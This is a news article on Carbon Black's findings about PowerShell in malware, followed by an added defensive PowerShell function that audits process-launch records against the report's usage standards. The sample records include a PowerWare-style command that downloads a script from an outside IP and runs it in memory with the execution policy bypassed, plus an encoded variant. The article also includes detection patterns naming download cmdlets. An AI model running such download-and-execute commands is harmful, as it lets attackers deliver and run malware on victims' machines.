
PowerShell is a powerful malware tool

Tim Greene | April 14, 2016
CarbonBlack: Use of the scripting language in malware is on the rise.

The report recommends setting standards for how PowerShell should be used:

  • Change ExecutionPolicy to only allow signed scripts to run.
  • Require all PowerShell scripts to be run from a specific location or path.
  • Discourage (or require exception for) the use of encoded parameters on the command line.
  • Discourage (or block) PowerShell scripts from downloading content from the Internet (or specify a “whitelist” of allowed IP addresses only).
  • Discourage (or block) the use of PowerShell to invoke commands on remote systems.
  • Require a custom parameter to be passed on all “legitimate” PowerShell usage.
  • Restrict PowerShell to specific users in your organization.
  • Require PowerShell to be launched from a specific process.

A relatively new ransomware family called PowerWare is an example of PowerShell being used maliciously. Distributed mainly through phishing, PowerWare starts as a macro in an emailed Word attachment. The macro launches an .exe file that starts two PowerShell instances, one to download the ransomware script and the other to run it.
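The report's standards above are stated as policy; in practice they are applied as checks over process-launch telemetry (parent process, user, full command line). The following is an added example, written for this page and not code from the article or from Carbon Black, that turns those standards into a PowerShell audit function and runs it over constructed launch records. The record field names (Parent, User, CommandLine), the policy values (approved script root, operator accounts, allowed parents, download whitelist, the `-OrgTicket` marker parameter) and every sample command line are assumptions; the second sample is modelled on the PowerWare chain described above, with a Word process as parent and a PowerShell instance that downloads a script and executes it in memory.

```powershell
# Added example, not from the article or from Carbon Black: audit PowerShell
# process-launch records against the report's usage standards. Record field
# names, policy values and sample command lines below are all assumptions.

$Policy = @{
    AllowedScriptRoot = 'C:\Scripts\Approved\'               # assumed approved script path
    AllowedUsers      = @('CORP\psadmin', 'CORP\svc-deploy') # assumed operator accounts
    AllowedParents    = @('explorer.exe', 'services.exe')    # assumed launching processes
    RequiredMarker    = '-OrgTicket'                         # assumed custom parameter
    AllowedHosts      = @('10.10.0.5')                       # assumed download whitelist
}

function Test-PowerShellLaunch {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)][pscustomobject]$Record,
        [hashtable]$Rules = $Policy
    )
    process {
        $cl = $Record.CommandLine
        $findings = [System.Collections.Generic.List[string]]::new()

        # Encoded parameters: powershell.exe accepts any unambiguous prefix of -EncodedCommand
        if ($cl -match '(?i)(^|\s)-e(c|n[a-z]*)?\s+[A-Za-z0-9+/=]{16,}') { $findings.Add('encoded command line') }

        # ExecutionPolicy is not a security boundary: a per-process override defeats AllSigned
        if ($cl -match '(?i)(^|\s)-e(x[a-z]*|p)\s+(bypass|unrestricted)') { $findings.Add('execution policy override') }

        # Internet downloads, allowed only from whitelisted hosts visible in the command line
        if ($cl -match '(?i)DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b|Start-BitsTransfer') {
            $urlHosts = @([regex]::Matches($cl, '(?i)https?://([^/\s:''"]+)') | ForEach-Object { $_.Groups[1].Value })
            $bad      = @($urlHosts | Where-Object { $_ -notin $Rules.AllowedHosts })
            if ($urlHosts.Count -eq 0 -or $bad.Count -gt 0) { $findings.Add("download outside whitelist: $($bad -join ',')") }
        }

        # Remote invocation from this host
        if ($cl -match '(?i)Invoke-Command|\bicm\b|Enter-PSSession|New-PSSession|-ComputerName\s') { $findings.Add('remote invocation') }

        # Scripts must live under the approved path
        $m = [regex]::Match($cl, '(?i)[A-Za-z]:\\[^\s"'']+\.ps1')
        if ($m.Success -and -not $m.Value.StartsWith($Rules.AllowedScriptRoot, [System.StringComparison]::OrdinalIgnoreCase)) {
            $findings.Add("script outside approved path: $($m.Value)")
        }

        # Legitimate usage carries the custom marker parameter
        if ($cl -notmatch [regex]::Escape($Rules.RequiredMarker)) { $findings.Add('missing custom parameter') }

        # Restricted users and expected launching process
        if ($Record.User -notin $Rules.AllowedUsers)     { $findings.Add("user not permitted: $($Record.User)") }
        if ($Record.Parent -notin $Rules.AllowedParents) { $findings.Add("unexpected parent: $($Record.Parent)") }

        $verdict = if ($findings.Count -eq 0) { 'ALLOW' } else { 'ALERT' }
        [pscustomobject]@{
            Verdict  = $verdict
            Parent   = $Record.Parent
            User     = $Record.User
            Findings = $findings -join '; '
        }
    }
}

# Constructed sample records (not real telemetry). The second models the PowerWare
# chain: Word macro parent, hidden policy-bypassing PowerShell, download and in-memory run.
# The -enc payload in the third decodes to the fragment "IEX (New-Object Net.WebClient)".
$SampleLaunches = @(
    [pscustomobject]@{ Parent = 'explorer.exe'; User = 'CORP\psadmin'
        CommandLine = 'powershell.exe -File C:\Scripts\Approved\Rotate-Logs.ps1 -OrgTicket CHG-1042' }
    [pscustomobject]@{ Parent = 'WINWORD.EXE'; User = 'CORP\jdoe'
        CommandLine = 'powershell.exe -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString(''http://203.0.113.9/x.ps1'')"' }
    [pscustomobject]@{ Parent = 'cmd.exe'; User = 'CORP\jdoe'
        CommandLine = 'powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA' }
    [pscustomobject]@{ Parent = 'explorer.exe'; User = 'CORP\psadmin'
        CommandLine = 'powershell.exe -File C:\Scripts\Approved\Audit-Services.ps1 -OrgTicket CHG-1051 -ComputerName FS01' }
)

$SampleLaunches | Test-PowerShellLaunch | Format-Table Verdict, Parent, User, Findings -AutoSize -Wrap
```

Run as written, the first record is allowed and the other three are flagged, the PowerWare-style one on five separate rules at once. The first bullet in the report is itself a one-liner, `Set-ExecutionPolicy AllSigned -Scope LocalMachine` from an elevated prompt, but note the caveat the audit encodes: execution policy is a safety catch, not a security boundary, since `-ExecutionPolicy Bypass` on the command line overrides it for that process, which is why the override switch is treated as a finding in its own right.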

PowerShell gives the attacker freedom of movement within the compromised network. “You become an employee of your target,” Johnson says.

